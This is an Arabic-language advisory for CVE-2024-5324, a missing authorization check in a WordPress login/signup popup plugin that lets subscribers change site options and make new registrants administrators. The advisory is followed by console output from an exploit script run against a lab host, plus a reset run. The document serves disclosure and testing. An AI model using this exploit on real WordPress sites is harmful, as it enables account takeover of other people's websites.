
Login/Signup Popup ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - تحديث خيارات تعسفي بدون تفويض
Login/Signup Popup ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - فقدان التفويض لتحديث الخيارات العشوائية
إضافة Login/Signup Popup ( Inline Form + Woocommerce ) لووردبريس معرضة لتعديل غير مصرح به للبيانات بسبب عدم وجود فحص للصلاحية في دالة 'import_settings' في الإصدارات 2.7.1 إلى 2.7.2. وهذا يتيح للمهاجمين المُوثقين، بمستوى وصول المشترك فما فوق، تغيير خيارات عشوائية في المواقع المتأثرة. يمكن استخدام ذلك لتفعيل تسجيل مستخدمين جدد وتعيين الدور الافتراضي للمستخدمين الجدد كمسؤول.
Severity: high
CVE ID: CVE-2024-5324
CVSS Score: 8.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: easy-login-woocommerce
WPScan URL: https://www.wpscan.com/plugin/easy-login-woocommerce
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=api-prod
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
You can now register a user on the as a admin.
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test --fix e
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Options reset to default